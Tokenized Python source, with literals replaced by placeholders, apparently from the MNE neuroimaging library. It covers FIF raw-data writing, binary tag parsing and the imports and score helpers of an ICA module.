FIFFB_MEAS ) <EOL> end_file ( fid ) <EOL> return use_fname , part_idx <EOL> def _start_writing_raw ( name , info , sel = None , data_type = FIFF . FIFFT_FLOAT , <EOL> reset_range = True ) : <EOL> """<STR_LIT>""" <EOL> info = pick_info ( info , sel ) <EOL> fid = start_file ( name ) <EOL> start_block ( fid , FIFF . FIFFB_MEAS ) <EOL> write_id ( fid , FIFF . FIFF_BLOCK_ID ) <EOL> if info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_PARENT_BLOCK_ID , info [ '<STR_LIT>' ] ) <EOL> cals = [ ] <EOL> for k in range ( info [ '<STR_LIT>' ] ) : <EOL> info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] = k + <NUM_LIT:1> <EOL> if reset_range is True : <EOL> info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] = <NUM_LIT:1.0> <EOL> cals . append ( info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] * info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] ) <EOL> write_meas_info ( fid , info , data_type = data_type , reset_range = reset_range ) <EOL> if info . get ( '<STR_LIT>' , False ) : <EOL> start_block ( fid , FIFF . FIFFB_SMSH_RAW_DATA ) <EOL> else : <EOL> start_block ( fid , FIFF . FIFFB_RAW_DATA ) <EOL> return fid , cals <EOL> def _write_raw_buffer ( fid , buf , cals , fmt , inv_comp ) : <EOL> """<STR_LIT>""" <EOL> if buf . shape [ <NUM_LIT:0> ] != len ( cals ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if fmt not in [ '<STR_LIT>' , '<STR_LIT:int>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if np . isrealobj ( buf ) : <EOL> if fmt == '<STR_LIT>' : <EOL> write_function = write_dau_pack16 <EOL> elif fmt == '<STR_LIT:int>' : <EOL> write_function = write_int <EOL> elif fmt == '<STR_LIT>' : <EOL> write_function = write_float <EOL> else : <EOL> write_function = write_double <EOL> else : <EOL> if fmt == '<STR_LIT>' : <EOL> write_function = write_complex64 <EOL> elif fmt == '<STR_LIT>' : <EOL> write_function = write_complex128 <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if inv_comp is not None : <EOL> buf = np . 
dot ( inv_comp / np . ravel ( cals ) [ : , None ] , buf ) <EOL> else : <EOL> buf = buf / np . ravel ( cals ) [ : , None ] <EOL> write_function ( fid , FIFF . FIFF_DATA_BUFFER , buf ) <EOL> def _my_hilbert ( x , n_fft = None , envelope = False ) : <EOL> """<STR_LIT>""" <EOL> from scipy . signal import hilbert <EOL> n_fft = x . shape [ - <NUM_LIT:1> ] if n_fft is None else n_fft <EOL> n_x = x . shape [ - <NUM_LIT:1> ] <EOL> out = hilbert ( x , N = n_fft ) [ : n_x ] <EOL> if envelope is True : <EOL> out = np . abs ( out ) <EOL> return out <EOL> def _check_raw_compatibility ( raw ) : <EOL> """<STR_LIT>""" <EOL> for ri in range ( <NUM_LIT:1> , len ( raw ) ) : <EOL> if not isinstance ( raw [ ri ] , type ( raw [ <NUM_LIT:0> ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not raw [ ri ] . info [ '<STR_LIT>' ] == raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not raw [ ri ] . info [ '<STR_LIT>' ] == raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not raw [ ri ] . info [ '<STR_LIT>' ] == raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not set ( raw [ ri ] . info [ '<STR_LIT>' ] ) == set ( raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] ) : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if not all ( raw [ ri ] . _cals == raw [ <NUM_LIT:0> ] . _cals ) : <EOL> raise ValueError ( '<STR_LIT>' % ri ) <EOL> if len ( raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] ) != len ( raw [ ri ] . info [ '<STR_LIT>' ] ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not all ( _proj_equal ( p1 , p2 ) for p1 , p2 in <EOL> zip ( raw [ <NUM_LIT:0> ] . info [ '<STR_LIT>' ] , raw [ ri ] . info [ '<STR_LIT>' ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not all ( r . orig_format == raw [ <NUM_LIT:0> ] . orig_format for r in raw ) : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raw [ <NUM_LIT:0> ] . 
orig_format = '<STR_LIT>' <EOL> def concatenate_raws ( raws , preload = None , events_list = None ) : <EOL> """<STR_LIT>""" <EOL> if events_list is not None : <EOL> if len ( events_list ) != len ( raws ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> first , last = zip ( * [ ( r . first_samp , r . last_samp ) for r in raws ] ) <EOL> events = concatenate_events ( events_list , first , last ) <EOL> raws [ <NUM_LIT:0> ] . append ( raws [ <NUM_LIT:1> : ] , preload ) <EOL> if events_list is None : <EOL> return raws [ <NUM_LIT:0> ] <EOL> else : <EOL> return raws [ <NUM_LIT:0> ] , events <EOL> def _check_update_montage ( info , montage , path = None , update_ch_names = False ) : <EOL> """<STR_LIT>""" <EOL> if montage is not None : <EOL> if not isinstance ( montage , ( string_types , Montage ) ) : <EOL> err = ( "<STR_LIT>" <EOL> "<STR_LIT>" % type ( montage ) ) <EOL> raise TypeError ( err ) <EOL> if montage is not None : <EOL> if isinstance ( montage , string_types ) : <EOL> montage = read_montage ( montage , path = path ) <EOL> _set_montage ( info , montage , update_ch_names = update_ch_names ) <EOL> missing_positions = [ ] <EOL> exclude = ( FIFF . FIFFV_EOG_CH , FIFF . FIFFV_MISC_CH , <EOL> FIFF . FIFFV_STIM_CH ) <EOL> for ch in info [ '<STR_LIT>' ] : <EOL> if not ch [ '<STR_LIT>' ] in exclude : <EOL> if np . unique ( ch [ '<STR_LIT>' ] ) . size == <NUM_LIT:1> : <EOL> missing_positions . append ( ch [ '<STR_LIT>' ] ) <EOL> if missing_positions : <EOL> raise KeyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % str ( missing_positions ) ) </s>
<s> import gzip <EOL> import os <EOL> import struct <EOL> import numpy as np <EOL> from . constants import FIFF <EOL> from . . fixes import partial <EOL> from . . externals . six import text_type <EOL> from . . externals . jdcal import jd2jcal <EOL> class Tag ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , kind , type_ , size , next , pos = None ) : <EOL> self . kind = int ( kind ) <EOL> self . type = int ( type_ ) <EOL> self . size = int ( size ) <EOL> self . next = int ( next ) <EOL> self . pos = pos if pos is not None else next <EOL> self . pos = int ( self . pos ) <EOL> self . data = None <EOL> def __repr__ ( self ) : <EOL> out = ( "<STR_LIT>" <EOL> % ( self . kind , self . type , self . size , self . next , self . pos ) ) <EOL> if hasattr ( self , '<STR_LIT:data>' ) : <EOL> out += "<STR_LIT>" % self . data <EOL> out += "<STR_LIT:\n>" <EOL> return out <EOL> def __cmp__ ( self , tag ) : <EOL> return int ( self . kind == tag . kind and <EOL> self . type == tag . type and <EOL> self . size == tag . size and <EOL> self . next == tag . next and <EOL> self . pos == tag . pos and <EOL> self . data == tag . data ) <EOL> def read_big ( fid , size = None ) : <EOL> """<STR_LIT>""" <EOL> buf_size = <NUM_LIT> <EOL> if size is None : <EOL> if not isinstance ( fid , gzip . GzipFile ) : <EOL> size = os . fstat ( fid . fileno ( ) ) . st_size - fid . tell ( ) <EOL> if size is not None : <EOL> segments = np . r_ [ np . arange ( <NUM_LIT:0> , size , buf_size ) , size ] <EOL> buf = bytearray ( b'<STR_LIT:U+0020>' * size ) <EOL> for start , end in zip ( segments [ : - <NUM_LIT:1> ] , segments [ <NUM_LIT:1> : ] ) : <EOL> data = fid . read ( int ( end - start ) ) <EOL> if len ( data ) != end - start : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> buf [ start : end ] = data <EOL> buf = bytes ( buf ) <EOL> else : <EOL> buf = [ b'<STR_LIT>' ] <EOL> new = fid . read ( buf_size ) <EOL> while len ( new ) > <NUM_LIT:0> : <EOL> buf . append ( new ) <EOL> new = fid . 
read ( buf_size ) <EOL> buf = b'<STR_LIT>' . join ( buf ) <EOL> return buf <EOL> def read_tag_info ( fid ) : <EOL> """<STR_LIT>""" <EOL> tag = _read_tag_header ( fid ) <EOL> if tag is None : <EOL> return None <EOL> if tag . next == <NUM_LIT:0> : <EOL> fid . seek ( tag . size , <NUM_LIT:1> ) <EOL> elif tag . next > <NUM_LIT:0> : <EOL> fid . seek ( tag . next , <NUM_LIT:0> ) <EOL> return tag <EOL> def _fromstring_rows ( fid , tag_size , dtype = None , shape = None , rlims = None ) : <EOL> """<STR_LIT>""" <EOL> if shape is not None : <EOL> item_size = np . dtype ( dtype ) . itemsize <EOL> if not len ( shape ) == <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> want_shape = np . prod ( shape ) <EOL> have_shape = tag_size // item_size <EOL> if want_shape != have_shape : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( want_shape , have_shape ) ) <EOL> if not len ( rlims ) == <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> n_row_out = rlims [ <NUM_LIT:1> ] - rlims [ <NUM_LIT:0> ] <EOL> if n_row_out <= <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> row_size = item_size * shape [ <NUM_LIT:1> ] <EOL> start_skip = int ( rlims [ <NUM_LIT:0> ] * row_size ) <EOL> read_size = int ( n_row_out * row_size ) <EOL> end_pos = int ( fid . tell ( ) + tag_size ) <EOL> fid . seek ( start_skip , <NUM_LIT:1> ) <EOL> out = np . fromstring ( fid . read ( read_size ) , dtype = dtype ) <EOL> fid . seek ( end_pos ) <EOL> else : <EOL> out = np . fromstring ( fid . read ( tag_size ) , dtype = dtype ) <EOL> return out <EOL> def _loc_to_coil_trans ( loc ) : <EOL> """<STR_LIT>""" <EOL> loc = loc . astype ( np . float64 ) <EOL> coil_trans = np . concatenate ( [ loc . reshape ( <NUM_LIT:4> , <NUM_LIT:3> ) . T [ : , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> ] ] , <EOL> np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) . 
reshape ( <NUM_LIT:1> , <NUM_LIT:4> ) ] ) <EOL> return coil_trans <EOL> def _coil_trans_to_loc ( coil_trans ) : <EOL> """<STR_LIT>""" <EOL> coil_trans = coil_trans . astype ( np . float64 ) <EOL> return np . roll ( coil_trans . T [ : , : <NUM_LIT:3> ] , <NUM_LIT:1> , <NUM_LIT:0> ) . flatten ( ) <EOL> def _loc_to_eeg_loc ( loc ) : <EOL> """<STR_LIT>""" <EOL> if loc [ <NUM_LIT:3> : <NUM_LIT:6> ] . any ( ) : <EOL> return np . array ( [ loc [ <NUM_LIT:0> : <NUM_LIT:3> ] , loc [ <NUM_LIT:3> : <NUM_LIT:6> ] ] ) . T <EOL> else : <EOL> return loc [ <NUM_LIT:0> : <NUM_LIT:3> ] [ : , np . newaxis ] . copy ( ) <EOL> _is_matrix = <NUM_LIT> <EOL> _matrix_coding_dense = <NUM_LIT> <EOL> _matrix_coding_CCS = <NUM_LIT> <EOL> _matrix_coding_RCS = <NUM_LIT> <EOL> _data_type = <NUM_LIT> <EOL> def _read_tag_header ( fid ) : <EOL> """<STR_LIT>""" <EOL> s = fid . read ( <NUM_LIT:4> * <NUM_LIT:4> ) <EOL> if len ( s ) == <NUM_LIT:0> : <EOL> return None <EOL> return Tag ( * struct . unpack ( '<STR_LIT>' , s ) ) <EOL> def _read_matrix ( fid , tag , shape , rlims , matrix_coding ) : <EOL> """<STR_LIT>""" <EOL> matrix_coding = matrix_coding >> <NUM_LIT:16> <EOL> if shape is not None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if matrix_coding == _matrix_coding_dense : <EOL> pos = fid . tell ( ) <EOL> fid . seek ( tag . size - <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> ndim = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = '<STR_LIT>' ) ) <EOL> fid . seek ( - ( ndim + <NUM_LIT:1> ) * <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> dims = np . fromstring ( fid . read ( <NUM_LIT:4> * ndim ) , dtype = '<STR_LIT>' ) [ : : - <NUM_LIT:1> ] <EOL> fid . seek ( pos , <NUM_LIT:0> ) <EOL> if ndim > <NUM_LIT:3> : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> matrix_type = _data_type & tag . type <EOL> if matrix_type == FIFF . FIFFT_INT : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . 
FIFFT_JULIAN : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_FLOAT : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_DOUBLE : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:8> * dims . prod ( ) ) , dtype = '<STR_LIT>' ) <EOL> elif matrix_type == FIFF . FIFFT_COMPLEX_FLOAT : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:4> * <NUM_LIT:2> * dims . prod ( ) ) , <EOL> dtype = '<STR_LIT>' ) <EOL> data = ( data [ : : <NUM_LIT:2> ] + <NUM_LIT> * data [ <NUM_LIT:1> : : <NUM_LIT:2> ] ) <EOL> elif matrix_type == FIFF . FIFFT_COMPLEX_DOUBLE : <EOL> data = np . fromstring ( read_big ( fid , <NUM_LIT:8> * <NUM_LIT:2> * dims . prod ( ) ) , <EOL> dtype = '<STR_LIT>' ) <EOL> data = ( data [ : : <NUM_LIT:2> ] + <NUM_LIT> * data [ <NUM_LIT:1> : : <NUM_LIT:2> ] ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' <EOL> % matrix_type ) <EOL> data . shape = dims <EOL> elif matrix_coding in ( _matrix_coding_CCS , _matrix_coding_RCS ) : <EOL> from scipy import sparse <EOL> pos = fid . tell ( ) <EOL> fid . seek ( tag . size - <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> ndim = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = '<STR_LIT>' ) ) <EOL> fid . seek ( - ( ndim + <NUM_LIT:2> ) * <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> dims = np . fromstring ( fid . read ( <NUM_LIT:4> * ( ndim + <NUM_LIT:1> ) ) , dtype = '<STR_LIT>' ) <EOL> if ndim != <NUM_LIT:2> : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fid . seek ( pos , <NUM_LIT:0> ) <EOL> nnz = int ( dims [ <NUM_LIT:0> ] ) <EOL> nrow = int ( dims [ <NUM_LIT:1> ] ) <EOL> ncol = int ( dims [ <NUM_LIT:2> ] ) <EOL> sparse_data = np . fromstring ( fid . 
read ( <NUM_LIT:4> * nnz ) , dtype = '<STR_LIT>' ) <EOL> shape = ( dims [ <NUM_LIT:1> ] , dims [ <NUM_LIT:2> ] ) <EOL> if matrix_coding == _matrix_coding_CCS : <EOL> tmp_indices = fid . read ( <NUM_LIT:4> * nnz ) <EOL> sparse_indices = np . fromstring ( tmp_indices , dtype = '<STR_LIT>' ) <EOL> tmp_ptrs = fid . read ( <NUM_LIT:4> * ( ncol + <NUM_LIT:1> ) ) <EOL> sparse_ptrs = np . fromstring ( tmp_ptrs , dtype = '<STR_LIT>' ) <EOL> if ( sparse_ptrs [ - <NUM_LIT:1> ] > len ( sparse_indices ) or <EOL> np . any ( sparse_ptrs < <NUM_LIT:0> ) ) : <EOL> sparse_indices = np . concatenate ( <EOL> ( np . fromstring ( tmp_indices [ : <NUM_LIT:4> * ( nrow + <NUM_LIT:1> ) ] , dtype = '<STR_LIT>' ) , <EOL> np . fromstring ( tmp_indices [ <NUM_LIT:4> * ( nrow + <NUM_LIT:1> ) : ] , dtype = '<STR_LIT>' ) ) ) <EOL> sparse_ptrs = np . fromstring ( tmp_ptrs , dtype = '<STR_LIT>' ) <EOL> data = sparse . csc_matrix ( ( sparse_data , sparse_indices , <EOL> sparse_ptrs ) , shape = shape ) <EOL> else : <EOL> sparse_indices = np . fromstring ( fid . read ( <NUM_LIT:4> * nnz ) , dtype = '<STR_LIT>' ) <EOL> sparse_ptrs = np . fromstring ( fid . read ( <NUM_LIT:4> * ( nrow + <NUM_LIT:1> ) ) , dtype = '<STR_LIT>' ) <EOL> data = sparse . csr_matrix ( ( sparse_data , sparse_indices , <EOL> sparse_ptrs ) , shape = shape ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return data <EOL> def _read_simple ( fid , tag , shape , rlims , dtype ) : <EOL> """<STR_LIT>""" <EOL> return _fromstring_rows ( fid , tag . size , dtype = dtype , shape = shape , <EOL> rlims = rlims ) <EOL> def _read_string ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> d = _fromstring_rows ( fid , tag . size , dtype = '<STR_LIT>' , shape = shape , rlims = rlims ) <EOL> return text_type ( d . tostring ( ) . 
decode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> def _read_complex_float ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> if shape is not None : <EOL> shape = ( shape [ <NUM_LIT:0> ] , shape [ <NUM_LIT:1> ] * <NUM_LIT:2> ) <EOL> d = _fromstring_rows ( fid , tag . size , dtype = "<STR_LIT>" , shape = shape , rlims = rlims ) <EOL> d = d [ : : <NUM_LIT:2> ] + <NUM_LIT> * d [ <NUM_LIT:1> : : <NUM_LIT:2> ] <EOL> return d <EOL> def _read_complex_double ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> if shape is not None : <EOL> shape = ( shape [ <NUM_LIT:0> ] , shape [ <NUM_LIT:1> ] * <NUM_LIT:2> ) <EOL> d = _fromstring_rows ( fid , tag . size , dtype = "<STR_LIT>" , shape = shape , rlims = rlims ) <EOL> d = d [ : : <NUM_LIT:2> ] + <NUM_LIT> * d [ <NUM_LIT:1> : : <NUM_LIT:2> ] <EOL> return d <EOL> def _read_id_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return dict ( <EOL> version = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> machid = np . fromstring ( fid . read ( <NUM_LIT:8> ) , dtype = "<STR_LIT>" ) , <EOL> secs = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> usecs = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) ) <EOL> def _read_dig_point_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return dict ( <EOL> kind = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> ident = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> r = np . fromstring ( fid . read ( <NUM_LIT:12> ) , dtype = "<STR_LIT>" ) , <EOL> coord_frame = FIFF . FIFFV_COORD_UNKNOWN ) <EOL> def _read_coord_trans_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> from . . transforms import Transform <EOL> fro = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> to = int ( np . fromstring ( fid . 
read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> rot = np . fromstring ( fid . read ( <NUM_LIT> ) , dtype = "<STR_LIT>" ) . reshape ( <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> move = np . fromstring ( fid . read ( <NUM_LIT:12> ) , dtype = "<STR_LIT>" ) <EOL> trans = np . r_ [ np . c_ [ rot , move ] , <EOL> np . array ( [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) . T ] <EOL> data = Transform ( fro , to , trans ) <EOL> fid . seek ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> return data <EOL> _coord_dict = { <EOL> FIFF . FIFFV_MEG_CH : FIFF . FIFFV_COORD_DEVICE , <EOL> FIFF . FIFFV_REF_MEG_CH : FIFF . FIFFV_COORD_DEVICE , <EOL> FIFF . FIFFV_EEG_CH : FIFF . FIFFV_COORD_HEAD , <EOL> } <EOL> def _read_ch_info_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> d = dict ( <EOL> scanno = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> logno = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> kind = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> range = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> cal = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> coil_type = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> loc = np . fromstring ( fid . read ( <NUM_LIT> ) , dtype = "<STR_LIT>" ) . astype ( np . float64 ) , <EOL> unit = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> unit_mul = int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) , <EOL> ) <EOL> ch_name = np . fromstring ( fid . read ( <NUM_LIT:16> ) , dtype = "<STR_LIT>" ) <EOL> ch_name = ch_name [ : np . argmax ( ch_name == b'<STR_LIT>' ) ] . tostring ( ) <EOL> d [ '<STR_LIT>' ] = ch_name . decode ( ) <EOL> d [ '<STR_LIT>' ] = _coord_dict . get ( d [ '<STR_LIT>' ] , FIFF . 
FIFFV_COORD_UNKNOWN ) <EOL> return d <EOL> def _read_old_pack ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> offset = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> scale = float ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) <EOL> data = np . fromstring ( fid . read ( tag . size - <NUM_LIT:8> ) , dtype = "<STR_LIT>" ) <EOL> data = data * scale <EOL> data += offset <EOL> return data <EOL> def _read_dir_entry_struct ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return [ _read_tag_header ( fid ) for _ in range ( tag . size // <NUM_LIT:16> - <NUM_LIT:1> ) ] <EOL> def _read_julian ( fid , tag , shape , rlims ) : <EOL> """<STR_LIT>""" <EOL> return jd2jcal ( int ( np . fromstring ( fid . read ( <NUM_LIT:4> ) , dtype = "<STR_LIT>" ) ) ) <EOL> _call_dict = { <EOL> FIFF . FIFFT_STRING : _read_string , <EOL> FIFF . FIFFT_COMPLEX_FLOAT : _read_complex_float , <EOL> FIFF . FIFFT_COMPLEX_DOUBLE : _read_complex_double , <EOL> FIFF . FIFFT_ID_STRUCT : _read_id_struct , <EOL> FIFF . FIFFT_DIG_POINT_STRUCT : _read_dig_point_struct , <EOL> FIFF . FIFFT_COORD_TRANS_STRUCT : _read_coord_trans_struct , <EOL> FIFF . FIFFT_CH_INFO_STRUCT : _read_ch_info_struct , <EOL> FIFF . FIFFT_OLD_PACK : _read_old_pack , <EOL> FIFF . FIFFT_DIR_ENTRY_STRUCT : _read_dir_entry_struct , <EOL> FIFF . FIFFT_JULIAN : _read_julian , <EOL> } <EOL> _simple_dict = { <EOL> FIFF . FIFFT_BYTE : '<STR_LIT>' , <EOL> FIFF . FIFFT_SHORT : '<STR_LIT>' , <EOL> FIFF . FIFFT_INT : '<STR_LIT>' , <EOL> FIFF . FIFFT_USHORT : '<STR_LIT>' , <EOL> FIFF . FIFFT_UINT : '<STR_LIT>' , <EOL> FIFF . FIFFT_FLOAT : '<STR_LIT>' , <EOL> FIFF . FIFFT_DOUBLE : '<STR_LIT>' , <EOL> FIFF . FIFFT_DAU_PACK16 : '<STR_LIT>' , <EOL> } <EOL> for key , dtype in _simple_dict . 
items ( ) : <EOL> _call_dict [ key ] = partial ( _read_simple , dtype = dtype ) <EOL> def read_tag ( fid , pos = None , shape = None , rlims = None ) : <EOL> """<STR_LIT>""" <EOL> if pos is not None : <EOL> fid . seek ( pos , <NUM_LIT:0> ) <EOL> tag = _read_tag_header ( fid ) <EOL> if tag . size > <NUM_LIT:0> : <EOL> matrix_coding = _is_matrix & tag . type <EOL> if matrix_coding != <NUM_LIT:0> : <EOL> tag . data = _read_matrix ( fid , tag , shape , rlims , matrix_coding ) <EOL> else : <EOL> fun = _call_dict . get ( tag . type ) <EOL> if fun is not None : <EOL> tag . data = fun ( fid , tag , shape , rlims ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % tag . type ) <EOL> if tag . next != FIFF . FIFFV_NEXT_SEQ : <EOL> fid . seek ( tag . next , <NUM_LIT:1> ) <EOL> return tag <EOL> def find_tag ( fid , node , findkind ) : <EOL> """<STR_LIT>""" <EOL> if node [ '<STR_LIT>' ] is not None : <EOL> for subnode in node [ '<STR_LIT>' ] : <EOL> if subnode . kind == findkind : <EOL> return read_tag ( fid , subnode . pos ) <EOL> return None <EOL> def has_tag ( node , kind ) : <EOL> """<STR_LIT>""" <EOL> for d in node [ '<STR_LIT>' ] : <EOL> if d . kind == kind : <EOL> return True <EOL> return False </s>
<s> from inspect import isfunction <EOL> from collections import namedtuple <EOL> from copy import deepcopy <EOL> import os <EOL> import json <EOL> import numpy as np <EOL> from scipy import linalg <EOL> from . ecg import ( qrs_detector , _get_ecg_channel_index , _make_ecg , <EOL> create_ecg_epochs ) <EOL> from . eog import _find_eog_events , _get_eog_channel_index <EOL> from . infomax_ import infomax <EOL> from . . cov import compute_whitener <EOL> from . . import Covariance , Evoked <EOL> from . . io . pick import ( pick_types , pick_channels , pick_info , <EOL> _pick_data_channels , _DATA_CH_TYPES_SPLIT ) <EOL> from . . io . write import ( write_double_matrix , write_string , <EOL> write_name_list , write_int , start_block , <EOL> end_block ) <EOL> from . . io . tree import dir_tree_find <EOL> from . . io . open import fiff_open <EOL> from . . io . tag import read_tag <EOL> from . . io . meas_info import write_meas_info , read_meas_info <EOL> from . . io . constants import Bunch , FIFF <EOL> from . . io . base import _BaseRaw <EOL> from . . epochs import _BaseEpochs <EOL> from . . viz import ( plot_ica_components , plot_ica_scores , <EOL> plot_ica_sources , plot_ica_overlay ) <EOL> from . . viz . utils import ( _prepare_trellis , tight_layout , plt_show , <EOL> _setup_vmin_vmax ) <EOL> from . . viz . topomap import ( _prepare_topo_plot , _check_outlines , <EOL> plot_topomap , _hide_frame ) <EOL> from . . channels . channels import _contains_ch_type , ContainsMixin <EOL> from . . io . write import start_file , end_file , write_id <EOL> from . . utils import ( check_version , logger , check_fname , verbose , <EOL> _reject_data_segments , check_random_state , <EOL> _get_fast_dot , compute_corr , _check_copy_dep ) <EOL> from . . fixes import _get_args <EOL> from . . filter import band_pass_filter <EOL> from . bads import find_outliers <EOL> from . ctps_ import ctps <EOL> from . . externals . 
six import string_types , text_type <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _make_xy_sfunc ( func , ndim_output = False ) : <EOL> """<STR_LIT>""" <EOL> if ndim_output : <EOL> def sfunc ( x , y ) : <EOL> return np . array ( [ func ( a , y . ravel ( ) ) for a in x ] ) [ : , <NUM_LIT:0> ] <EOL> else : <EOL> def sfunc ( x , y ) : <EOL> return np . array ( [ func ( a , y . ravel ( ) ) for a in x ] ) <EOL> sfunc . __name__ = '<STR_LIT:.>' . join ( [ '<STR_LIT>' , func . __module__ , func . __name__ ] ) <EOL> sfunc . __doc__ = func . __doc__ <EOL> return sfunc <EOL> def get_score_funcs ( ) : <EOL> """<STR_LIT>""" <EOL> from scipy import stats <EOL> from scipy . spatial import distance <EOL> score_funcs = Bunch ( ) <EOL> xy_arg_dist_funcs = [ ( n , f ) for n , f in vars ( distance ) . items ( ) <EOL> if isfunction ( f ) and not n . startswith ( '<STR_LIT:_>' ) ] <EOL> xy_arg_stats_funcs = [ ( n , f ) for n , f in vars ( stats ) . items ( ) <EOL> if isfunction ( f ) and not n . startswith ( '<STR_LIT:_>' ) ] <EOL> score_funcs . update ( dict ( ( n , _make_xy_sfunc ( f ) ) <EOL> for n , f in xy_arg_dist_funcs <EOL> if _get_args ( f ) == [ '<STR_LIT:u>' , '<STR_LIT:v>' ] ) ) <EOL> 